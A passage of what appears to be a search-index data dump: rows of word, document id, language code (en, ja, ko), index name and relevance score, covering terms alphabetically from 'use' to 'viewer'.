('use', 18, 'ja', 'help_search', 6),
('use', 18, 'ko', 'help_search', 6),
('use', 22, 'en', 'help_search', 9),
('use', 22, 'ja', 'help_search', 9),
('use', 22, 'ko', 'help_search', 9),
('use', 25, 'en', 'help_search', 1),
('use', 25, 'ja', 'help_search', 1),
('use', 26, 'en', 'help_search', 1),
('use', 26, 'ja', 'help_search', 1),
('use', 26, 'ko', 'help_search', 1),
('use', 28, 'en', 'help_search', 3.73884),
('use', 28, 'ja', 'help_search', 3.73884),
('use', 28, 'ko', 'help_search', 3.73884),
('use', 32, 'en', 'help_search', 1),
('use', 32, 'ja', 'help_search', 1),
('use', 32, 'ko', 'help_search', 1),
('use', 33, 'en', 'help_search', 1),
('use', 33, 'ja', 'help_search', 1),
('use', 33, 'ko', 'help_search', 1),
('use', 35, 'en', 'help_search', 2),
('use', 35, 'ja', 'help_search', 2),
('use', 35, 'ko', 'help_search', 2),
('use', 37, 'en', 'help_search', 1.98902),
('use', 37, 'ja', 'help_search', 1.98902),
('use', 37, 'ko', 'help_search', 1.98902),
('use', 39, 'en', 'help_search', 4),
('use', 39, 'ja', 'help_search', 4),
('use', 39, 'ko', 'help_search', 4),
('use', 42, 'en', 'help_search', 1),
('use', 42, 'ja', 'help_search', 1),
('use', 42, 'ko', 'help_search', 1),
('use', 43, 'en', 'help_search', 0.876337),
('use', 43, 'ja', 'help_search', 0.876337),
('use', 43, 'ko', 'help_search', 0.876337),
('use', 44, 'en', 'help_search', 1),
('use', 44, 'ja', 'help_search', 1),
('use', 44, 'ko', 'help_search', 1),
('use', 46, 'en', 'help_search', 1.98902),
('use', 46, 'ja', 'help_search', 1.98902),
('use', 46, 'ko', 'help_search', 1.98902),
('use', 50, 'en', 'help_search', 6.99731),
('use', 50, 'ja', 'help_search', 6.99731),
('use', 50, 'ko', 'help_search', 6.99731),
('use', 54, 'en', 'help_search', 2),
('use', 54, 'ja', 'help_search', 2),
('use', 54, 'ko', 'help_search', 2),
('use', 61, 'en', 'help_search', 2),
('use', 61, 'ja', 'help_search', 2),
('use', 61, 'ko', 'help_search', 2),
('use', 65, 'en', 'help_search', 1),
('use', 65, 'ja', 'help_search', 1),
('use', 65, 'ko', 'help_search', 1),
('use', 68, 'en', 'help_search', 18.4099),
('use', 68, 'ja', 'help_search', 18.4099),
('use', 68, 'ko', 'help_search', 18.4099),
('use', 69, 'en', 'help_search', 5),
('use', 69, 'ja', 'help_search', 5),
('use', 69, 'ko', 'help_search', 5),
('use', 71, 'en', 'help_search', 2),
('use', 71, 'ja', 'help_search', 2),
('use', 71, 'ko', 'help_search', 2),
('use', 72, 'en', 'help_search', 1),
('use', 72, 'ja', 'help_search', 1),
('use', 72, 'ko', 'help_search', 1),
('use', 73, 'en', 'help_search', 6),
('use', 73, 'ja', 'help_search', 6),
('use', 73, 'ko', 'help_search', 6),
('use', 77, 'en', 'help_search', 3),
('use', 77, 'ja', 'help_search', 3),
('use', 77, 'ko', 'help_search', 3),
('use', 80, 'en', 'help_search', 2.99731),
('use', 80, 'ja', 'help_search', 2.99731),
('use', 80, 'ko', 'help_search', 2.99731),
('use', 86, 'en', 'help_search', 2),
('use', 86, 'ja', 'help_search', 2),
('use', 86, 'ko', 'help_search', 2),
('used', 6, 'en', 'help_search', 1.99731),
('used', 6, 'ja', 'help_search', 1.99731),
('used', 6, 'ko', 'help_search', 1.99731),
('used', 11, 'en', 'help_search', 1),
('used', 11, 'ja', 'help_search', 1),
('used', 11, 'ko', 'help_search', 1),
('used', 24, 'en', 'help_search', 1),
('used', 24, 'ja', 'help_search', 1),
('used', 24, 'ko', 'help_search', 1),
('used', 25, 'en', 'help_search', 1),
('used', 25, 'ja', 'help_search', 1),
('used', 26, 'en', 'help_search', 1),
('used', 26, 'ja', 'help_search', 1),
('used', 26, 'ko', 'help_search', 1),
('used', 27, 'en', 'help_search', 1),
('used', 27, 'ja', 'help_search', 1),
('used', 27, 'ko', 'help_search', 1),
('used', 28, 'en', 'help_search', 2),
('used', 28, 'ja', 'help_search', 2),
('used', 28, 'ko', 'help_search', 2),
('used', 29, 'en', 'help_search', 1),
('used', 29, 'ja', 'help_search', 1),
('used', 29, 'ko', 'help_search', 1),
('used', 30, 'en', 'help_search', 0.976851),
('used', 30, 'ja', 'help_search', 0.976851),
('used', 30, 'ko', 'help_search', 0.976851),
('used', 31, 'ja', 'help_search', 1),
('used', 34, 'en', 'help_search', 1),
('used', 34, 'ja', 'help_search', 1),
('used', 34, 'ko', 'help_search', 1),
('used', 36, 'en', 'help_search', 1),
('used', 36, 'ja', 'help_search', 1),
('used', 36, 'ko', 'help_search', 1),
('used', 40, 'en', 'help_search', 1),
('used', 40, 'ja', 'help_search', 1),
('used', 40, 'ko', 'help_search', 1),
('used', 48, 'en', 'help_search', 3),
('used', 48, 'ja', 'help_search', 3),
('used', 48, 'ko', 'help_search', 3),
('used', 50, 'en', 'help_search', 5),
('used', 50, 'ja', 'help_search', 5),
('used', 50, 'ko', 'help_search', 5),
('used', 57, 'en', 'help_search', 1),
('used', 57, 'ja', 'help_search', 1),
('used', 57, 'ko', 'help_search', 1),
('used', 77, 'en', 'help_search', 1),
('used', 77, 'ja', 'help_search', 1),
('used', 77, 'ko', 'help_search', 1),
('used', 78, 'en', 'help_search', 3),
('used', 78, 'ja', 'help_search', 3),
('used', 78, 'ko', 'help_search', 3),
('used', 80, 'en', 'help_search', 2),
('used', 80, 'ja', 'help_search', 2),
('used', 80, 'ko', 'help_search', 2),
('used', 84, 'en', 'help_search', 1),
('used', 84, 'ja', 'help_search', 1),
('used', 84, 'ko', 'help_search', 1),
('useful', 28, 'en', 'help_search', 1),
('useful', 28, 'ja', 'help_search', 1),
('useful', 28, 'ko', 'help_search', 1),
('user', 2, 'en', 'help_search', 11),
('user', 2, 'ja', 'help_search', 11),
('user', 2, 'ko', 'help_search', 11),
('user', 6, 'en', 'help_search', 1),
('user', 6, 'ja', 'help_search', 1),
('user', 6, 'ko', 'help_search', 1),
('user', 11, 'en', 'help_search', 2.91674),
('user', 11, 'ja', 'help_search', 2.91674),
('user', 11, 'ko', 'help_search', 2.91674),
('user', 18, 'en', 'help_search', 19),
('user', 18, 'ja', 'help_search', 19),
('user', 18, 'ko', 'help_search', 19),
('user', 20, 'en', 'help_search', 4),
('user', 20, 'ja', 'help_search', 4),
('user', 20, 'ko', 'help_search', 4),
('user', 23, 'en', 'help_search', 2.92384),
('user', 23, 'ja', 'help_search', 2.92384),
('user', 23, 'ko', 'help_search', 2.92384),
('user', 29, 'en', 'help_search', 10.1622),
('user', 29, 'ja', 'help_search', 10.1622),
('user', 29, 'ko', 'help_search', 10.1622),
('user', 30, 'en', 'help_search', 22.0204),
('user', 30, 'ja', 'help_search', 22.0204),
('user', 30, 'ko', 'help_search', 22.0204),
('user', 31, 'ja', 'help_search', 27.3552),
('user', 32, 'en', 'help_search', 21.0175),
('user', 32, 'ja', 'help_search', 21.0175),
('user', 32, 'ko', 'help_search', 21.0175),
('user', 33, 'en', 'help_search', 22),
('user', 33, 'ja', 'help_search', 22),
('user', 33, 'ko', 'help_search', 22),
('user', 34, 'en', 'help_search', 22),
('user', 34, 'ja', 'help_search', 22),
('user', 34, 'ko', 'help_search', 22),
('user', 35, 'en', 'help_search', 2),
('user', 35, 'ja', 'help_search', 2),
('user', 35, 'ko', 'help_search', 2),
('user', 36, 'en', 'help_search', 12),
('user', 36, 'ja', 'help_search', 12),
('user', 36, 'ko', 'help_search', 12),
('user', 37, 'en', 'help_search', 1),
('user', 37, 'ja', 'help_search', 1),
('user', 37, 'ko', 'help_search', 1),
('user', 38, 'en', 'help_search', 11),
('user', 38, 'ja', 'help_search', 11),
('user', 38, 'ko', 'help_search', 11),
('user', 41, 'en', 'help_search', 2),
('user', 41, 'ja', 'help_search', 2),
('user', 41, 'ko', 'help_search', 2),
('user', 42, 'en', 'help_search', 1),
('user', 42, 'ja', 'help_search', 1),
('user', 42, 'ko', 'help_search', 1),
('user', 43, 'en', 'help_search', 0.916736),
('user', 43, 'ja', 'help_search', 0.916736),
('user', 43, 'ko', 'help_search', 0.916736),
('user', 44, 'en', 'help_search', 2),
('user', 44, 'ja', 'help_search', 2),
('user', 44, 'ko', 'help_search', 2),
('user', 46, 'en', 'help_search', 1),
('user', 46, 'ja', 'help_search', 1),
('user', 46, 'ko', 'help_search', 1),
('user', 47, 'en', 'help_search', 28),
('user', 47, 'ja', 'help_search', 28),
('user', 47, 'ko', 'help_search', 28),
('user', 50, 'en', 'help_search', 3),
('user', 50, 'ja', 'help_search', 3),
('user', 50, 'ko', 'help_search', 3),
('user', 51, 'en', 'help_search', 5),
('user', 51, 'ja', 'help_search', 5),
('user', 51, 'ko', 'help_search', 5),
('user', 52, 'en', 'help_search', 29),
('user', 52, 'ja', 'help_search', 29),
('user', 52, 'ko', 'help_search', 29),
('user', 53, 'en', 'help_search', 1),
('user', 53, 'ja', 'help_search', 1),
('user', 53, 'ko', 'help_search', 1),
('user', 56, 'en', 'help_search', 1),
('user', 56, 'ja', 'help_search', 1),
('user', 56, 'ko', 'help_search', 1),
('user', 59, 'en', 'help_search', 22.8038),
('user', 59, 'ja', 'help_search', 22.8038),
('user', 59, 'ko', 'help_search', 22.8038),
('user', 60, 'en', 'help_search', 22),
('user', 60, 'ja', 'help_search', 22),
('user', 60, 'ko', 'help_search', 22),
('user', 61, 'en', 'help_search', 21.7671),
('user', 61, 'ja', 'help_search', 21.7671),
('user', 61, 'ko', 'help_search', 21.7671),
('user', 63, 'en', 'help_search', 11),
('user', 63, 'ja', 'help_search', 11),
('user', 63, 'ko', 'help_search', 11),
('user', 65, 'en', 'help_search', 13),
('user', 65, 'ja', 'help_search', 13),
('user', 65, 'ko', 'help_search', 13),
('user', 68, 'en', 'help_search', 8.33564),
('user', 68, 'ja', 'help_search', 8.33564),
('user', 68, 'ko', 'help_search', 8.33564),
('user', 69, 'en', 'help_search', 1),
('user', 69, 'ja', 'help_search', 1),
('user', 69, 'ko', 'help_search', 1),
('user', 70, 'en', 'help_search', 11),
('user', 70, 'ja', 'help_search', 11),
('user', 70, 'ko', 'help_search', 11),
('user', 72, 'en', 'help_search', 3),
('user', 72, 'ja', 'help_search', 3),
('user', 72, 'ko', 'help_search', 3),
('user', 73, 'en', 'help_search', 4),
('user', 73, 'ja', 'help_search', 4),
('user', 73, 'ko', 'help_search', 4),
('user', 76, 'en', 'help_search', 11),
('user', 76, 'ja', 'help_search', 11),
('user', 76, 'ko', 'help_search', 11),
('user', 79, 'en', 'help_search', 11),
('user', 79, 'ja', 'help_search', 11),
('user', 79, 'ko', 'help_search', 11),
('user', 80, 'en', 'help_search', 11.6063),
('user', 80, 'ja', 'help_search', 11.6063),
('user', 80, 'ko', 'help_search', 11.6063),
('user', 82, 'en', 'help_search', 43),
('user', 82, 'ja', 'help_search', 43),
('user', 82, 'ko', 'help_search', 43),
('user', 84, 'en', 'help_search', 69),
('user', 84, 'ja', 'help_search', 69),
('user', 84, 'ko', 'help_search', 69),
('user', 86, 'en', 'help_search', 57.974),
('user', 86, 'ja', 'help_search', 57.974),
('user', 86, 'ko', 'help_search', 57.974),
('user', 87, 'en', 'help_search', 33),
('user', 87, 'ja', 'help_search', 33),
('user', 87, 'ko', 'help_search', 33),
('user', 91, 'en', 'help_search', 10.5295),
('user', 91, 'ja', 'help_search', 10.4874),
('user', 91, 'ko', 'help_search', 10.5295),
('user', 93, 'en', 'help_search', 11.2515),
('user', 93, 'ja', 'help_search', 11.2515),
('user', 93, 'ko', 'help_search', 11.2515),
('userdefined', 30, 'en', 'help_search', 1),
('userdefined', 30, 'ja', 'help_search', 1),
('userdefined', 30, 'ko', 'help_search', 1),
('userinterface', 41, 'en', 'help_search', 1),
('userinterface', 41, 'ja', 'help_search', 1),
('userinterface', 41, 'ko', 'help_search', 1),
('username', 82, 'en', 'help_search', 4),
('username', 82, 'ja', 'help_search', 4),
('username', 82, 'ko', 'help_search', 4),
('users', 7, 'en', 'help_search', 1),
('users', 7, 'ja', 'help_search', 1),
('users', 7, 'ko', 'help_search', 1),
('users', 8, 'en', 'help_search', 1),
('users', 8, 'ja', 'help_search', 1),
('users', 8, 'ko', 'help_search', 1),
('users', 10, 'en', 'help_search', 1),
('users', 10, 'ja', 'help_search', 1),
('users', 10, 'ko', 'help_search', 1),
('users', 11, 'en', 'help_search', 2.85934),
('users', 11, 'ja', 'help_search', 2.85934),
('users', 11, 'ko', 'help_search', 2.85934),
('users', 17, 'en', 'help_search', 1),
('users', 17, 'ja', 'help_search', 1),
('users', 17, 'ko', 'help_search', 1),
('users', 18, 'en', 'help_search', 6),
('users', 18, 'ja', 'help_search', 6),
('users', 18, 'ko', 'help_search', 6),
('users', 20, 'en', 'help_search', 4),
('users', 20, 'ja', 'help_search', 4),
('users', 20, 'ko', 'help_search', 4),
('users', 22, 'en', 'help_search', 2),
('users', 22, 'ja', 'help_search', 2),
('users', 22, 'ko', 'help_search', 2),
('users', 28, 'en', 'help_search', 3.77902),
('users', 28, 'ja', 'help_search', 3.77902),
('users', 28, 'ko', 'help_search', 3.77902),
('users', 31, 'ja', 'help_search', 1.87313),
('users', 37, 'en', 'help_search', 4.86555),
('users', 37, 'ja', 'help_search', 4.86555),
('users', 37, 'ko', 'help_search', 4.86555),
('users', 40, 'en', 'help_search', 2),
('users', 40, 'ja', 'help_search', 2),
('users', 40, 'ko', 'help_search', 2),
('users', 42, 'en', 'help_search', 7),
('users', 42, 'ja', 'help_search', 7),
('users', 42, 'ko', 'help_search', 7),
('users', 43, 'en', 'help_search', 1),
('users', 43, 'ja', 'help_search', 1),
('users', 43, 'ko', 'help_search', 1),
('users', 45, 'en', 'help_search', 1),
('users', 45, 'ja', 'help_search', 1),
('users', 45, 'ko', 'help_search', 1),
('users', 46, 'en', 'help_search', 20.9729),
('users', 46, 'ja', 'help_search', 20.9729),
('users', 46, 'ko', 'help_search', 20.9729),
('users', 50, 'en', 'help_search', 1),
('users', 50, 'ja', 'help_search', 1),
('users', 50, 'ko', 'help_search', 1),
('users', 59, 'en', 'help_search', 3),
('users', 59, 'ja', 'help_search', 3),
('users', 59, 'ko', 'help_search', 3),
('users', 60, 'en', 'help_search', 1),
('users', 60, 'ja', 'help_search', 1),
('users', 60, 'ko', 'help_search', 1),
('users', 61, 'en', 'help_search', 2),
('users', 61, 'ja', 'help_search', 2),
('users', 61, 'ko', 'help_search', 2),
('users', 63, 'en', 'help_search', 1),
('users', 63, 'ja', 'help_search', 1),
('users', 63, 'ko', 'help_search', 1),
('users', 64, 'en', 'help_search', 1),
('users', 64, 'ja', 'help_search', 1),
('users', 64, 'ko', 'help_search', 1),
('users', 65, 'en', 'help_search', 1),
('users', 65, 'ja', 'help_search', 1),
('users', 65, 'ko', 'help_search', 1),
('users', 67, 'en', 'help_search', 1),
('users', 67, 'ja', 'help_search', 1),
('users', 67, 'ko', 'help_search', 1),
('users', 68, 'en', 'help_search', 6.53343),
('users', 68, 'ja', 'help_search', 6.53343),
('users', 68, 'ko', 'help_search', 6.53343),
('users', 69, 'en', 'help_search', 4),
('users', 69, 'ja', 'help_search', 4),
('users', 69, 'ko', 'help_search', 4),
('users', 73, 'en', 'help_search', 1),
('users', 73, 'ja', 'help_search', 1),
('users', 73, 'ko', 'help_search', 1),
('users', 79, 'en', 'help_search', 1),
('users', 79, 'ja', 'help_search', 1),
('users', 79, 'ko', 'help_search', 1),
('users', 80, 'en', 'help_search', 2),
('users', 80, 'ja', 'help_search', 2),
('users', 80, 'ko', 'help_search', 2),
('users', 81, 'en', 'help_search', 2),
('users', 81, 'ja', 'help_search', 2),
('users', 81, 'ko', 'help_search', 2),
('users', 84, 'en', 'help_search', 8),
('users', 84, 'ja', 'help_search', 8),
('users', 84, 'ko', 'help_search', 8),
('users', 86, 'en', 'help_search', 8),
('users', 86, 'ja', 'help_search', 8),
('users', 86, 'ko', 'help_search', 8),
('users', 93, 'en', 'help_search', 3.85439),
('users', 93, 'ja', 'help_search', 3.85439),
('users', 93, 'ko', 'help_search', 3.85439),
('uses', 38, 'en', 'help_search', 1),
('uses', 38, 'ja', 'help_search', 1),
('uses', 38, 'ko', 'help_search', 1),
('uses', 50, 'en', 'help_search', 1),
('uses', 50, 'ja', 'help_search', 1),
('uses', 50, 'ko', 'help_search', 1),
('uses', 67, 'en', 'help_search', 1),
('uses', 67, 'ja', 'help_search', 1),
('uses', 67, 'ko', 'help_search', 1),
('using', 7, 'en', 'help_search', 1),
('using', 7, 'ja', 'help_search', 1),
('using', 7, 'ko', 'help_search', 1),
('using', 13, 'en', 'help_search', 1),
('using', 13, 'ja', 'help_search', 1),
('using', 13, 'ko', 'help_search', 1),
('using', 20, 'en', 'help_search', 20),
('using', 20, 'ja', 'help_search', 20),
('using', 20, 'ko', 'help_search', 20),
('using', 22, 'en', 'help_search', 26),
('using', 22, 'ja', 'help_search', 26),
('using', 22, 'ko', 'help_search', 26),
('using', 30, 'en', 'help_search', 9.24453),
('using', 30, 'ja', 'help_search', 9.24453),
('using', 30, 'ko', 'help_search', 9.24453),
('using', 33, 'en', 'help_search', 2),
('using', 33, 'ja', 'help_search', 2),
('using', 33, 'ko', 'help_search', 2),
('using', 35, 'en', 'help_search', 1.99731),
('using', 35, 'ja', 'help_search', 1.99731),
('using', 35, 'ko', 'help_search', 1.99731),
('using', 39, 'en', 'help_search', 26),
('using', 39, 'ja', 'help_search', 26),
('using', 39, 'ko', 'help_search', 26),
('using', 43, 'en', 'help_search', 28.8828),
('using', 43, 'ja', 'help_search', 28.8828),
('using', 43, 'ko', 'help_search', 28.8828),
('using', 44, 'en', 'help_search', 5),
('using', 44, 'ja', 'help_search', 5),
('using', 44, 'ko', 'help_search', 5),
('using', 46, 'en', 'help_search', 1),
('using', 46, 'ja', 'help_search', 1),
('using', 46, 'ko', 'help_search', 1),
('using', 47, 'en', 'help_search', 19),
('using', 47, 'ja', 'help_search', 19),
('using', 47, 'ko', 'help_search', 19),
('using', 52, 'en', 'help_search', 1),
('using', 52, 'ja', 'help_search', 1),
('using', 52, 'ko', 'help_search', 1),
('using', 68, 'en', 'help_search', 0.873132),
('using', 68, 'ja', 'help_search', 0.873132),
('using', 68, 'ko', 'help_search', 0.873132),
('using', 69, 'en', 'help_search', 26),
('using', 69, 'ja', 'help_search', 26),
('using', 69, 'ko', 'help_search', 26),
('using', 75, 'en', 'help_search', 1),
('using', 75, 'ja', 'help_search', 1),
('using', 75, 'ko', 'help_search', 1),
('using', 77, 'en', 'help_search', 1),
('using', 77, 'ja', 'help_search', 1),
('using', 77, 'ko', 'help_search', 1),
('using', 84, 'en', 'help_search', 1),
('using', 84, 'ja', 'help_search', 1),
('using', 84, 'ko', 'help_search', 1),
('using', 87, 'en', 'node_search', 1),
('using', 88, 'en', 'help_search', 1),
('using', 88, 'ja', 'help_search', 1),
('using', 88, 'ko', 'help_search', 1),
('using', 91, 'en', 'help_search', 1),
('using', 91, 'ja', 'help_search', 1),
('using', 91, 'ko', 'help_search', 1),
('using', 93, 'en', 'help_search', 0.860547),
('using', 93, 'ja', 'help_search', 0.860547),
('using', 93, 'ko', 'help_search', 0.860547),
('usually', 7, 'en', 'node_search', 2),
('usually', 7, 'ko', 'node_search', 2),
('usually', 27, 'en', 'help_search', 1),
('usually', 27, 'ja', 'help_search', 1),
('usually', 27, 'ko', 'help_search', 1),
('uuid', 30, 'en', 'help_search', 5.2071),
('uuid', 30, 'ja', 'help_search', 5.2071),
('uuid', 30, 'ko', 'help_search', 5.2071),
('valid', 23, 'en', 'help_search', 1),
('valid', 23, 'ja', 'help_search', 1),
('valid', 23, 'ko', 'help_search', 1),
('valid', 37, 'en', 'help_search', 1),
('valid', 37, 'ja', 'help_search', 1),
('valid', 37, 'ko', 'help_search', 1),
('valuable', 164, 'en', 'node_search', 1),
('valuable', 167, 'en', 'node_search', 1),
('valuable', 175, 'en', 'node_search', 1),
('valuable', 176, 'en', 'node_search', 1),
('valuable', 177, 'en', 'node_search', 1),
('valuable', 184, 'en', 'node_search', 1),
('valuable', 185, 'en', 'node_search', 1),
('valuable', 187, 'en', 'node_search', 1),
('valuable', 190, 'en', 'node_search', 1),
('valuable', 192, 'en', 'node_search', 1),
('valuable', 193, 'en', 'node_search', 1),
('valuable', 198, 'en', 'node_search', 1),
('value', 7, 'en', 'help_search', 3.78332),
('value', 7, 'ja', 'help_search', 3.78332),
('value', 7, 'ko', 'help_search', 3.78332),
('value', 24, 'en', 'help_search', 4),
('value', 24, 'ja', 'help_search', 4),
('value', 24, 'ko', 'help_search', 4),
('value', 27, 'en', 'help_search', 4),
('value', 27, 'ja', 'help_search', 4),
('value', 27, 'ko', 'help_search', 4),
('value', 30, 'en', 'help_search', 0.714225),
('value', 30, 'ja', 'help_search', 0.714225),
('value', 30, 'ko', 'help_search', 0.714225),
('value', 64, 'en', 'help_search', 1),
('value', 64, 'ja', 'help_search', 1),
('value', 64, 'ko', 'help_search', 1),
('value', 91, 'en', 'help_search', 2),
('value', 91, 'ja', 'help_search', 2),
('value', 91, 'ko', 'help_search', 2),
('valued', 120, 'en', 'node_search', 1),
('values', 7, 'en', 'help_search', 4.90974),
('values', 7, 'ja', 'help_search', 4.90974),
('values', 7, 'ko', 'help_search', 4.90974),
('values', 24, 'en', 'help_search', 6),
('values', 24, 'ja', 'help_search', 6),
('values', 24, 'ko', 'help_search', 6),
('values', 27, 'en', 'help_search', 6),
('values', 27, 'ja', 'help_search', 6),
('values', 27, 'ko', 'help_search', 6),
('values', 31, 'ja', 'help_search', 6.37799),
('values', 61, 'en', 'help_search', 3),
('values', 61, 'ja', 'help_search', 3),
('values', 61, 'ko', 'help_search', 3),
('values', 72, 'en', 'help_search', 1),
('values', 72, 'ja', 'help_search', 1),
('values', 72, 'ko', 'help_search', 1),
('values', 87, 'en', 'help_search', 1),
('values', 87, 'ja', 'help_search', 1),
('values', 87, 'ko', 'help_search', 1),
('variables', 86, 'en', 'help_search', 25),
('variables', 86, 'ja', 'help_search', 25),
('variables', 86, 'ko', 'help_search', 25),
('variations', 31, 'ja', 'help_search', 1),
('various', 23, 'en', 'help_search', 1),
('various', 23, 'en', 'node_search', 1),
('various', 23, 'ja', 'help_search', 1),
('various', 23, 'ko', 'help_search', 1),
('various', 24, 'en', 'node_search', 1),
('various', 27, 'en', 'node_search', 0.716357),
('various', 43, 'en', 'help_search', 0.927431),
('various', 43, 'ja', 'help_search', 0.927431),
('various', 43, 'ko', 'help_search', 0.927431),
('vary', 1, 'en', 'help_search', 1),
('vary', 1, 'ja', 'help_search', 1),
('vary', 1, 'ko', 'help_search', 1),
('vary', 24, 'en', 'help_search', 1),
('vary', 24, 'ja', 'help_search', 1),
('vary', 24, 'ko', 'help_search', 1),
('vary', 31, 'en', 'node_search', 1),
('vary', 89, 'en', 'help_search', 1),
('vary', 89, 'ja', 'help_search', 1),
('vary', 89, 'ko', 'help_search', 1),
('vegetable', 133, 'en', 'node_search', 1),
('vegetables', 80, 'en', 'help_search', 1),
('vegetables', 80, 'ja', 'help_search', 1),
('vegetables', 80, 'ko', 'help_search', 1),
('vehicle', 23, 'en', 'node_search', 1),
('vehicles', 27, 'en', 'node_search', 1),
('venereal', 31, 'en', 'node_search', 0.961087),
('venture', 27, 'en', 'node_search', 1),
('verification', 86, 'en', 'help_search', 2),
('verification', 86, 'ja', 'help_search', 2),
('verification', 86, 'ko', 'help_search', 2),
('verified', 11, 'en', 'help_search', 1),
('verified', 11, 'ja', 'help_search', 1),
('verified', 11, 'ko', 'help_search', 1),
('verified', 91, 'en', 'help_search', 1),
('verified', 91, 'ja', 'help_search', 1),
('verified', 91, 'ko', 'help_search', 1),
('verify', 18, 'en', 'help_search', 1),
('verify', 18, 'ja', 'help_search', 1),
('verify', 18, 'ko', 'help_search', 1),
('verify', 27, 'en', 'help_search', 1),
('verify', 27, 'ja', 'help_search', 1),
('verify', 27, 'ko', 'help_search', 1),
('verify', 28, 'en', 'help_search', 0.797402),
('verify', 28, 'ja', 'help_search', 0.797402),
('verify', 28, 'ko', 'help_search', 0.797402),
('verify', 45, 'en', 'help_search', 4),
('verify', 45, 'ja', 'help_search', 4),
('verify', 45, 'ko', 'help_search', 4),
('verify', 50, 'en', 'help_search', 0.968904),
('verify', 50, 'ja', 'help_search', 0.968904),
('verify', 50, 'ko', 'help_search', 0.968904),
('verify', 56, 'en', 'help_search', 1),
('verify', 56, 'ja', 'help_search', 1),
('verify', 56, 'ko', 'help_search', 1),
('verify', 63, 'en', 'help_search', 1),
('verify', 63, 'ja', 'help_search', 1),
('verify', 63, 'ko', 'help_search', 1),
('verify', 66, 'en', 'help_search', 1),
('verify', 66, 'ja', 'help_search', 1),
('verify', 67, 'en', 'help_search', 0.896076),
('verify', 67, 'ja', 'help_search', 0.896076),
('verify', 67, 'ko', 'help_search', 0.896076),
('verify', 68, 'en', 'help_search', 0.860547),
('verify', 68, 'ja', 'help_search', 0.860547),
('verify', 68, 'ko', 'help_search', 0.860547),
('verify', 69, 'en', 'help_search', 0.997306),
('verify', 69, 'ja', 'help_search', 0.997306),
('verify', 69, 'ko', 'help_search', 0.997306),
('verify', 75, 'en', 'help_search', 1),
('verify', 75, 'ja', 'help_search', 1),
('verify', 75, 'ko', 'help_search', 1),
('verify', 77, 'en', 'help_search', 2),
('verify', 77, 'ja', 'help_search', 2),
('verify', 77, 'ko', 'help_search', 2),
('verify', 82, 'en', 'help_search', 1),
('verify', 82, 'ja', 'help_search', 1),
('verify', 82, 'ko', 'help_search', 1),
('verify', 86, 'en', 'help_search', 0.98493),
('verify', 86, 'ja', 'help_search', 0.98493),
('verify', 86, 'ko', 'help_search', 0.98493),
('verify', 89, 'en', 'help_search', 1),
('verify', 89, 'ja', 'help_search', 1),
('verify', 89, 'ko', 'help_search', 1),
('verify', 91, 'en', 'help_search', 1),
('verify', 91, 'ja', 'help_search', 1),
('verify', 91, 'ko', 'help_search', 1),
('verify', 92, 'en', 'help_search', 1),
('verify', 92, 'ja', 'help_search', 1),
('verify', 92, 'ko', 'help_search', 1),
('versatile', 35, 'en', 'help_search', 1),
('versatile', 35, 'ja', 'help_search', 1),
('versatile', 35, 'ko', 'help_search', 1),
('versions', 30, 'en', 'help_search', 0.896076),
('versions', 30, 'ja', 'help_search', 0.896076),
('versions', 30, 'ko', 'help_search', 0.896076),
('vertical', 60, 'en', 'help_search', 1),
('vertical', 60, 'ja', 'help_search', 1),
('vertical', 60, 'ko', 'help_search', 1),
('very', 31, 'ja', 'help_search', 1.6956),
('very', 66, 'en', 'node_search', 1),
('very', 68, 'en', 'help_search', 1),
('very', 68, 'ja', 'help_search', 1),
('very', 68, 'ko', 'help_search', 1),
('very', 199, 'en', 'node_search', 1),
('veteran', 27, 'en', 'node_search', 0.997306),
('via', 11, 'en', 'help_search', 1),
('via', 11, 'ja', 'help_search', 1),
('via', 11, 'ko', 'help_search', 1),
('via', 44, 'en', 'help_search', 1),
('via', 44, 'ja', 'help_search', 1),
('via', 44, 'ko', 'help_search', 1),
('viber', 11, 'en', 'node_search', 1),
('viber', 11, 'ja', 'node_search', 1),
('viber', 62, 'en', 'node_search', 0.786915),
('viber', 62, 'ja', 'node_search', 0.470829),
('vibrant', 66, 'en', 'node_search', 0.96498),
('videos', 35, 'en', 'help_search', 1),
('videos', 35, 'ja', 'help_search', 1),
('videos', 35, 'ko', 'help_search', 1),
('view', 18, 'en', 'help_search', 6),
('view', 18, 'ja', 'help_search', 6),
('view', 18, 'ko', 'help_search', 6),
('view', 19, 'en', 'help_search', 1),
('view', 19, 'ja', 'help_search', 1),
('view', 19, 'ko', 'help_search', 1),
('view', 22, 'en', 'help_search', 2),
('view', 22, 'ja', 'help_search', 2),
('view', 22, 'ko', 'help_search', 2),
('view', 30, 'en', 'help_search', 1),
('view', 30, 'ja', 'help_search', 1),
('view', 30, 'ko', 'help_search', 1),
('view', 46, 'en', 'help_search', 0.96498),
('view', 46, 'ja', 'help_search', 0.96498),
('view', 46, 'ko', 'help_search', 0.96498),
('view', 47, 'en', 'help_search', 2),
('view', 47, 'ja', 'help_search', 2),
('view', 47, 'ko', 'help_search', 2),
('view', 53, 'en', 'help_search', 1),
('view', 53, 'ja', 'help_search', 1),
('view', 53, 'ko', 'help_search', 1),
('view', 68, 'en', 'help_search', 7.26433),
('view', 68, 'ja', 'help_search', 7.26433),
('view', 68, 'ko', 'help_search', 7.26433),
('view', 69, 'en', 'help_search', 2),
('view', 69, 'ja', 'help_search', 2),
('view', 69, 'ko', 'help_search', 2),
('view', 81, 'en', 'help_search', 2),
('view', 81, 'ja', 'help_search', 2),
('view', 81, 'ko', 'help_search', 2),
('view', 88, 'en', 'help_search', 32),
('view', 88, 'ja', 'help_search', 32),
('view', 88, 'ko', 'help_search', 32),
('view', 89, 'en', 'help_search', 33.9849),
('view', 89, 'ja', 'help_search', 33.9809),
('view', 89, 'ko', 'help_search', 33.9849),
('view', 90, 'en', 'help_search', 42),
('view', 90, 'ja', 'help_search', 42),
('view', 90, 'ko', 'help_search', 42),
('view', 91, 'en', 'help_search', 29),
('view', 91, 'ja', 'help_search', 29),
('view', 91, 'ko', 'help_search', 29),
('view', 93, 'en', 'help_search', 51.209),
('view', 93, 'ja', 'help_search', 51.209),
('view', 93, 'ko', 'help_search', 51.209),
('viewed', 20, 'en', 'help_search', 1),
('viewed', 20, 'ja', 'help_search', 1),
('viewed', 20, 'ko', 'help_search', 1),
('viewed', 40, 'en', 'help_search', 1),
('viewed', 40, 'ja', 'help_search', 1),
('viewed', 40, 'ko', 'help_search', 1),
('viewed', 46, 'en', 'help_search', 1),
('viewed', 46, 'ja', 'help_search', 1),
('viewed', 46, 'ko', 'help_search', 1),
('viewer', 20, 'en', 'help_search', 1),
